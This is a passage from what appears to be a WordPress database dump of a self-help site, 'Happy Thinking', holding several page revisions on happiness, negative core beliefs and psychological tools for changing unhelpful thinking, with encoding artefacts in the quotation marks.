-->\n\n<!-- wp:paragraph -->\n<p>Tila, probably realising that my answer was not going to come in a hurry, said, â€œDonâ€™t worry, I too struggled to come up with an answer when I was asked the same question many years ago. Even now, I have to ponder about it. In my current thinking, to be happy means different things to different people. To me, to be happy means to have a mind that is at peace despite all the stresses the world throws at it. Even with lots of challenges and difficult circumstances, if oneâ€™s mind can remain stress-free, in a good mood, and without worry and fear, then I think we can describe that person as being â€œhappyâ€. What do you think?â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Thankful that Tila had answered most of it, I just added my bit, â€œYes, I think I agree with how you describe what it is to be happy. I suffer, in various combinations, anxiety, depression and stress. I suppose not having these would make me a happy person.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Tila smiled, â€œYes, that makes sense. I am sure as we go along, we will both discover more and more about what it is to be happy. I am pleased to accompany you on this journey.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button /--></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'What is happiness?', '', 'inherit', 'closed', 'closed', '', '1994-revision-v1', '', '', '2023-07-02 09:24:50', '2023-07-02 09:24:50', '', 1994, 'https://www.happythinking.com/?p=1998', 0, 'revision', '', 0),
(1639, 1, '2023-05-30 18:01:28', '2023-05-30 18:01:28', '<!-- wp:paragraph -->\n<p>First of all, let me make it clear that when I talk about â€œbeliefsâ€, I certainly do not mean religious beliefs! Rather, it is about the beliefs one has about oneself, other people, and the world. For example, regarding oneself, one might have the belief, â€œI am caringâ€. Regarding others, one might have the belief, â€œPeople are selfishâ€ and regarding the world, one might have the belief, â€œThere are a lot of dangers out there.â€ Such beliefs are central to a person''s view of everything within and outside, and for this reason, are called â€œcore beliefsâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When one is born, oneâ€™s mind essentially has no beliefs about anything. However, from that blank state onwards, one starts to form beliefs about various things. For example, even as a baby, one would learn which faces belong to those that will cuddle and give nourishment and which faces belong to those who provide no benefit. I.e. one forms certain beliefs about who is â€œgoodâ€ for oneâ€™s survival and who is â€œbadâ€. As oneâ€™s childhood years progress, one''s brain continually updates oneâ€™s core beliefs.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Core beliefs are the driving force of a person, and one''s mind tries its best to think in ways that support such core beliefs. I call thoughts that support oneâ€™s core beliefs, â€œsupporting thoughtsâ€. For example, imagine that a person has the core belief, â€œI can learn new thingsâ€. For this core belief, one of the supportive thoughts might be, â€œIf I have an opportunity to learn new things, I should take up that opportunityâ€. Letâ€™s take another example, where a person, who we will call Sujith, has the core belief, â€œI have good leadership skillsâ€. Now suppose Sujith, at a social event, meets an owner of a major company and that person offers Sujith a very attractive job as a manager. In this situation, Sujithâ€™s mind may develop the supporting thought, â€œI have the skills that will help me to do well in this new job, therefore I should accept itâ€, prompting him to take up that offer. However, let us now imagine that Sujith''s mind has the opposite core belief, â€œI have poor leadership skillsâ€. In this scenario, if he was offered the same job, his mind might have the supporting thought, â€œYou have useless leadership skills and you will therefore fail in this new jobâ€, prompting him to refuse the job offer. The supporting thoughts blindly support one''s core beliefs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As core beliefs direct almost all aspects of oneâ€™s life, itâ€™s very important that one has core beliefs that truly represent oneself. You may now wonder how one can have core beliefs that do not truly represent oneself. Unfortunately, this can happen quite easily and I will explain how. As mentioned before, core beliefs start to form in oneâ€™s childhood, which is a time when oneâ€™s mind is not fully developed and is quite immature. This can lead to one having core beliefs that may not be truly logical. For example, imagine that a small child is with her mother, who is quite preoccupied with some pressing issue. As they walk in the park, imagine that the mother buys ice cream for her child. Unfortunately, a few minutes later, imagine that the child accidentally drops the ice cream, and the mother, in a lapse of concentration, says, â€œYou are stupidâ€. While an adult in this situation would not consider herself to be seriously stupid just because one drops an ice cream, for a child, who does not have the mental maturity of an adult, this event, coming from her mother who she values, may be taken seriously, and lead to the formation of the negative core belief, â€œI am stupidâ€. Now you might say, â€œSurely, when this child grows up, she would replace this with a more realistic core belief, such as â€œI am not stupid.â€ Unfortunately, things are not all that logical when it comes to the mind! What can happen is that some childhood core beliefs can remain unchanged in the mind and persist into adulthood. This can happen because oneâ€™s mind may have not â€œbotheredâ€ to challenge those beliefs with new, more logical adult thinking. Such unchallenged negative core beliefs that persist into adulthood can cause harm. In the example of the child with the negative core belief, â€œI am stupidâ€, if this is not challenged with new thinking (i.e. adult logic), the adult may well continue with the same negative core belief, and that may well limit the potential of this adult. For example, this unchallenged negative core belief may well dissuade the adult from pursuing a university education. This would be a pity, because this negative core belief may well be untrue, and the person may well have flourished in university.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Such unchallenged negative core beliefs may remain quietly in the background, and get activated at only certain times. For example, continuing with the ice cream example, the adult person may not be always thinking â€œI am stupid.â€ But say, when this person thinks about applying for a university education, the â€œI am stupidâ€ negative core belief may surface at that moment, and dissuade the person from continuing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Core beliefs can sometimes be difficult to discover as they may lie in the background. However, you will recall that the mind also has â€œsupporting thoughtsâ€, that support core beliefs. If you cannot work out your core beliefs, you may be able to recognise the supporting thoughts instead. For example, when thinking about higher education, you may not recognise the negative core belief â€œI am stupidâ€, but instead, recognise the supporting thought, â€œI should not apply to university, as I will surely fail if I enrolled in one.â€ Such supporting thoughts that support untrue negative core beliefs are â€œunhelpfulâ€ in your life. Analysing oneâ€™s unhelpful thinking patterns can suggest the hidden negative core beliefs in a person.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can imagine, unchallenged core beliefs can unnecessarily limit a person''s potential. One goal of happy thinking is of course to deal with such beliefs. However, we will keep that for later on the website, when we discuss various psychological tools that you can use to access and change core beliefs. For now, just remember the basic concept of core beliefs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/all_or_nothing_thinking/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/forgetting-gratitude/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Negative core beliefs', '', 'inherit', 'closed', 'closed', '', '1632-revision-v1', '', '', '2023-05-30 18:01:28', '2023-05-30 18:01:28', '', 1632, 'https://www.happythinking.com/?p=1639', 0, 'revision', '', 0),
(1640, 1, '2023-05-30 18:03:24', '2023-05-30 18:03:24', '<!-- wp:paragraph -->\n<p>First of all, let me make it clear that when I talk about â€œbeliefsâ€, I certainly do not mean religious beliefs! Rather, it is about the beliefs one has about oneself, other people, and the world. For example, regarding oneself, one might have the belief, â€œI am caringâ€. Regarding others, one might have the belief, â€œPeople are selfishâ€ and regarding the world, one might have the belief, â€œThere are a lot of dangers out there.â€ Such beliefs are central to a person''s view of everything within and outside, and for this reason, are called â€œcore beliefsâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When one is born, oneâ€™s mind essentially has no beliefs about anything. However, from that blank state onwards, one starts to form beliefs about various things. For example, even as a baby, one would learn which faces belong to those that will cuddle and give nourishment and which faces belong to those who provide no benefit. I.e. one forms certain beliefs about who is â€œgoodâ€ for oneâ€™s survival and who is â€œbadâ€. As oneâ€™s childhood years progress, one''s brain continually updates oneâ€™s core beliefs.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Core beliefs are the driving force of a person, and one''s mind tries its best to think in ways that support such core beliefs. I call thoughts that support oneâ€™s core beliefs, â€œsupporting thoughtsâ€. For example, imagine that a person has the core belief, â€œI can learn new thingsâ€. For this core belief, one of the supportive thoughts might be, â€œIf I have an opportunity to learn new things, I should take up that opportunityâ€. Letâ€™s take another example, where a person, who we will call Sujith, has the core belief, â€œI have good leadership skillsâ€. Now suppose Sujith, at a social event, meets an owner of a major company and that person offers Sujith a very attractive job as a manager. In this situation, Sujithâ€™s mind may develop the supporting thought, â€œI have the skills that will help me to do well in this new job, therefore I should accept itâ€, prompting him to take up that offer. However, let us now imagine that Sujith''s mind has the opposite core belief, â€œI have poor leadership skillsâ€. In this scenario, if he was offered the same job, his mind might have the supporting thought, â€œYou have useless leadership skills and you will therefore fail in this new jobâ€, prompting him to refuse the job offer. The supporting thoughts blindly support one''s core beliefs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As core beliefs direct almost all aspects of oneâ€™s life, itâ€™s very important that one has core beliefs that truly represent oneself. You may now wonder how one can have core beliefs that do not truly represent oneself. Unfortunately, this can happen quite easily and I will explain how. As mentioned before, core beliefs start to form in oneâ€™s childhood, which is a time when oneâ€™s mind is not fully developed and is quite immature. This can lead to one having core beliefs that may not be truly logical. For example, imagine that a small child is with her mother, who is quite preoccupied with some pressing issue. As they walk in the park, imagine that the mother buys ice cream for her child. Unfortunately, a few minutes later, imagine that the child accidentally drops the ice cream, and the mother, in a lapse of concentration, says, â€œYou are stupidâ€. While an adult in this situation would not consider herself to be seriously stupid just because one drops an ice cream, for a child, who does not have the mental maturity of an adult, this event, coming from her mother who she values, may be taken seriously, and lead to the formation of the negative core belief, â€œI am stupidâ€. Now you might say, â€œSurely, when this child grows up, she would replace this with a more realistic core belief, such as â€œI am not stupid.â€ Unfortunately, things are not all that logical when it comes to the mind! What can happen is that some childhood core beliefs can remain unchanged in the mind and persist into adulthood. This can happen because oneâ€™s mind may have not â€œbotheredâ€ to challenge those beliefs with new, more logical adult thinking. Such unchallenged negative core beliefs that persist into adulthood can cause harm. In the example of the child with the negative core belief, â€œI am stupidâ€, if this is not challenged with new thinking (i.e. adult logic), the adult may well continue with the same negative core belief, and that may well limit the potential of this adult. For example, this unchallenged negative core belief may well dissuade the adult from pursuing a university education. This would be a pity, because this negative core belief may well be untrue, and the person may well have flourished in university.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Such unchallenged negative core beliefs may remain quietly in the background, and get activated at only certain times. For example, continuing with the ice cream example, the adult person may not be always thinking â€œI am stupid.â€ But say, when this person thinks about applying for a university education, the â€œI am stupidâ€ negative core belief may surface at that moment, and dissuade the person from continuing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Core beliefs can sometimes be difficult to discover as they may lie in the background. However, you will recall that the mind also has â€œsupporting thoughtsâ€, that support core beliefs. If you cannot work out your core beliefs, you may be able to recognise the supporting thoughts instead. For example, when thinking about higher education, you may not recognise the negative core belief â€œI am stupidâ€, but instead, recognise the supporting thought, â€œI should not apply to university, as I will surely fail if I enrolled in one.â€ Such supporting thoughts that support untrue negative core beliefs are â€œunhelpfulâ€ in your life. Analysing oneâ€™s unhelpful thinking patterns can suggest the hidden negative core beliefs in a person.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can imagine, unchallenged core beliefs can unnecessarily limit a person''s potential. One goal of happy thinking is of course to deal with such beliefs. However, we will keep that for later on the website, when we discuss various psychological tools that you can use to access and change core beliefs. For now, just remember the basic concept of core beliefs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/all_or_nothing_thinking/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/forgetting_gratitude/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Negative core beliefs', '', 'inherit', 'closed', 'closed', '', '1632-revision-v1', '', '', '2023-05-30 18:03:24', '2023-05-30 18:03:24', '', 1632, 'https://www.happythinking.com/?p=1640', 0, 'revision', '', 0),
(1641, 1, '2023-05-30 18:05:37', '2023-05-30 18:05:37', '<!-- wp:paragraph -->\n<p>In the past sections, we went through common unhelpful thinking patterns that can contribute to one being unhappy. Now that you understand these unhelpful thinking patterns you will be able to recognise such thinking when it happens in your own mind. However, while recognition itself might make you feel better, the real changes will only come when you are able to change unhelpful thinking patterns into more helpful thinking patterns.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It would have been wonderful if there was a magical brain surgeon who could magically rewire our brains so that we would be able to think in more helpful ways. Unfortunately, such magical surgeons do not exist, and I doubt something like that would be even possible in our lifetime. While scientific understanding of how our brains work has progressed hugely, we still know very little and there is a long way to go before seeing exactly how â€œthinkingâ€ happens. However, luckily for us, the human mind has an amazing power, which is the power to heal itself. Our minds have the ability to analyse our thoughts and change themselves.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So how can oneâ€™s mind change itself? This can be done using certain â€œmental toolsâ€, somewhat like how a car mechanic would use various tools to fix a car not running well. Of course, the tools one can use on the mind are not made of metal! Instead, the mental tools that I will share with you are made of psychological techniques that one can use to change how one thinks. In the next sections of this website, I will share with you these psychological tools which you can use to change your thinking into ways that promote happiness in you (i.e. Happy Thinking!).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some of the psychological tools will help you better notice when you are thinking in unhelpful ways. i.e. you will become more â€œsensitiveâ€ in detecting unhelpful thinking patterns when it happens in your mind. Other tools will help you to change unhelpful thinking patterns into helpful thinking patterns.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some tools will be more useful to use right at the moment that you detect unhelpful thinking patterns in your mind, whereas other tools will be more useful at times when you are able to reflect on how you were thinking on the day. i.e. some tools are â€œimmediate useâ€ tools whereas others are â€œuse laterâ€ tools, to be used when you are relaxed.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When an engineer uses tools to fix a machine, they have to choose the correct tool. Not all tools will be useful to repair a given fault. Also, sometimes, a fault will need multiple tools to be used together. The use of psychological tools is no different. You will need to try various tools to see which one works for you. And also, you may well need to use more than one tool at the same time.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>You may find that some of the psychological tools may appear to be â€œsimpleâ€, and this may put you off. Do not confuse simple as being the same as being â€œineffectiveâ€! Many solutions in life do not have to be complex, and the key is to try and judge for yourself how useful or not useful something is. Do not prejudge, rather, give the tools a chance before putting them away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unhelpful thinking patterns can develop over many years and get entrenched into oneâ€™s mind, making oneâ€™s mind resist change. Therefore please give time for the tools to work. Do not expect instant cures.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the next sections of this website, you will embark on learning about the various psychological tools that I will share with you. As you start your journey, remember to open up your mind to change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-core-beliefs/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/inner-voice/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Psychological tools', '', 'publish', 'closed', 'closed', '', 'psychological-tools', '', '', '2024-01-12 14:55:57', '2024-01-12 14:55:57', '', 0, 'https://www.happythinking.com/?page_id=1641', 0, 'page', '', 0),
(1642, 1, '2023-05-30 18:05:37', '2023-05-30 18:05:37', '', 'Psychological tools', '', 'inherit', 'closed', 'closed', '', '1641-revision-v1', '', '', '2023-05-30 18:05:37', '2023-05-30 18:05:37', '', 1641, 'https://www.happythinking.com/?p=1642', 0, 'revision', '', 0),
(2006, 1, '2023-07-02 20:43:30', '2023-07-02 20:43:30', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":1977,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking270623.jpg" alt="" class="wp-image-1977"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website, I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind. I will also share with you various mental methods that will help you to change negative thinking into more positive ways of thinking. These methods will be very practical so that you can use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-07-02 20:43:30', '2023-07-02 20:43:30', '', 88, 'https://www.happythinking.com/?p=2006', 0, 'revision', '', 0),
(2001, 1, '2023-07-02 11:54:58', '2023-07-02 11:54:58', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":1977,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking270623.jpg" alt="" class="wp-image-1977"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website, I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind. I will also share with you various mental methods that will help you to change negative thinking into more positive ways of thinking. These methods will be very practical so that you can use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1910} /-->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-07-02 11:54:58', '2023-07-02 11:54:58', '', 88, 'https://www.happythinking.com/?p=2001', 0, 'revision', '', 0),
(1644, 1, '2023-05-30 18:07:52', '2023-05-30 18:07:52', '<!-- wp:paragraph -->\n<p>In the past sections, we went through common unhelpful thinking patterns that can contribute to one being unhappy. Now that you understand these unhelpful thinking patterns you will be able to recognise such thinking when it happens in your own mind. However, while recognition itself might make you feel better, the real changes will only come when you are able to change unhelpful thinking patterns into more helpful thinking patterns.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It would have been wonderful if there was a magical brain surgeon who could magically rewire our brains so that we would be able to think in more helpful ways. Unfortunately, such magical surgeons do not exist, and I doubt something like that would be even possible in our lifetime. While scientific understanding of how our brains work has progressed hugely, we still know very little and there is a long way to go before seeing exactly how â€œthinkingâ€ happens. However, luckily for us, the human mind has an amazing power, which is the power to heal itself. Our minds have the ability to analyse our thoughts and change themselves.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So how can oneâ€™s mind change itself? This one can be done using â€œtoolsâ€, something like how a car mechanic would use various tools to fix a car not running well. Of course, the tools one can use on the mind are not made of metal, but rather are made of psychological techniques that one can use to change how one thinks. In the next sections of this website, I will share with you these psychological tools which you can use to change your thinking into ways that promote happiness in you (i.e. Happy Thinking!).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some of the psychological tools will help you better detect when you are thinking in unhelpful ways. i.e. you will become more â€œsensitiveâ€ in detecting unhelpful thinking when it happens in your mind. Other tools will help you to change unhelpful thinking into helpful thinking.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some tools will be more useful to use right at the moment that you detect unhelpful thinking patterns in your mind, whereas other tools will be more useful at times when you are able to reflect on how you were thinking on the day. i.e. some tools are â€œimmediate useâ€ tools whereas others are â€œuse laterâ€ tools, to be used when you are relaxed.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When an engineer uses tools to fix a machine, they have to choose the correct tool. Not all tools will be useful to repair a given fault. Also, sometimes, a fault will need multiple tools to be used together. The use of psychological tools is no different. You will need to try various tools to see which one works for you. And also, you may well need to use more than one tool at the same time.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>You may find that some of the psychological tools may appear to be â€œsimpleâ€, and this may put you off. Do not confuse simple as being the same as being â€œineffectiveâ€! Many solutions in life do not have to be complex, and the key is to try and judge for yourself how useful or not useful something is. Do not prejudge, rather, give the tools a chance before putting them away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unhelpful thinking patterns can develop over many years and get entrenched into oneâ€™s mind, making oneâ€™s mind resist change. In the next sections of this website, you will embark on learning about the various psychological tools that I will share with you. As you start your journey, remember to open up your mind to change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/forgetting_gratitude/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Psychological tools', '', 'inherit', 'closed', 'closed', '', '1641-revision-v1', '', '', '2023-05-30 18:07:52', '2023-05-30 18:07:52', '', 1641, 'https://www.happythinking.com/?p=1644', 0, 'revision', '', 0),
